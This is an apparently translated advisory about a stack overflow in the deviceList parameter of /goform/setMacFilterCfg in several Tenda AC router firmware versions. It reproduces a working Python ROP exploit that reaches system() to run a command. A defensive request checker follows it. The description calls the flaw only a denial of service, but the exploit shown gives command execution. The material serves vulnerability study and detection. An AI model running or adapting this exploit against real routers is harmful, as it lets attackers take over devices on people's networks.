Vulnerability analysis article #
https://www.anquanke.com/post/id/204403#h2-7
Vulnerability description #
An attacker can exploit this vulnerability to cause a denial of service (by overwriting the function's return address).
Affected versions #
Tenda AC7 version V15.03.06.44_CN;
AC9 version V15.03.05.19(6318)_CN;
AC10 version V15.03.06.23_CN;
AC15 version V15.03.05.19_CN;
AC18 version V15.03.05.19(6318)_CN;
PoC from the analysis article
import requests
from pwn import *

# Command the PoC runs on the device once control flow reaches system()
cmd = "echo hello"

# libc base and offsets are specific to the firmware analysed in the article
libc_base = 0xff58c000
system_offset = 0x5a270
gadget1_offset = 0x18298
gadget2_offset = 0x40cb8

system_addr = libc_base + system_offset
gadget1 = libc_base + gadget1_offset
gadget2 = libc_base + gadget2_offset

# 176 bytes of padding up to the saved return address, then the ROP chain and the command string
# (Python 2 style str concatenation with p32(), as in the original PoC)
payload = "A" * 176 + p32(gadget1) + p32(system_addr) + p32(gadget2) + cmd

# The overflow is reached through the deviceList parameter of /goform/setMacFilterCfg
url = "http://192.168.2.111/goform/setMacFilterCfg"
cookie = {"Cookie": "password=12345"}
data = {"macFilterType": "white", "deviceList": "r" + payload}
requests.post(url, cookies=cookie, data=data)
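An added defender-side check, not part of the original article or the Tenda firmware: it inspects a form-encoded setMacFilterCfg request body and flags deviceList values whose length or content would not fit the expected MAC-address list. The 176-byte bound is taken from the PoC's padding; the MAC-list entry format and the accepted macFilterType values are assumptions.

```python
import re
from urllib.parse import parse_qs

# Bound taken from the PoC: 176 bytes of padding reach the saved return address,
# so anything that long or longer in deviceList can overwrite it.
MAX_DEVICELIST_LEN = 176
# Assumption: a legitimate entry is one MAC address in colon-separated hex form.
MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(:[0-9A-Fa-f]{2}){5}$")
ALLOWED_FILTER_TYPES = ("white", "black")  # assumption about the form's values


def check_mac_filter_body(body: str) -> list:
    """Return findings for one form-encoded setMacFilterCfg body; empty means it looks benign."""
    findings = []
    fields = parse_qs(body, keep_blank_values=True)
    device_list = fields.get("deviceList", [""])[0]

    # 1. Length: the stack buffer cannot hold the PoC's padding plus ROP chain.
    if len(device_list) >= MAX_DEVICELIST_LEN:
        findings.append("deviceList length %d >= %d" % (len(device_list), MAX_DEVICELIST_LEN))

    # 2. Content: packed addresses (p32) decode to non-printable bytes, never to MAC text.
    if any(ord(c) < 0x20 or ord(c) > 0x7E for c in device_list if c not in "\r\n"):
        findings.append("deviceList contains non-printable bytes")

    # 3. Format: every entry (assumed separated by newline, comma or semicolon) must be a MAC.
    for entry in re.split(r"[\r\n,;]", device_list):
        entry = entry.strip()
        if entry and not MAC_RE.match(entry):
            findings.append("non-MAC entry: %r" % entry[:16])
            break

    if fields.get("macFilterType", [""])[0] not in ALLOWED_FILTER_TYPES:
        findings.append("unexpected macFilterType")
    return findings


# Constructed sample bodies (not captured traffic): one benign, one shaped like the PoC's padding.
BENIGN_BODY = "macFilterType=white&deviceList=00:11:22:33:44:55,66:77:88:99:AA:BB"
OVERSIZED_BODY = "macFilterType=white&deviceList=r" + "A" * 200

if __name__ == "__main__":
    for name, body in (("benign", BENIGN_BODY), ("oversized", OVERSIZED_BODY)):
        print(name, check_mac_filter_body(body))
```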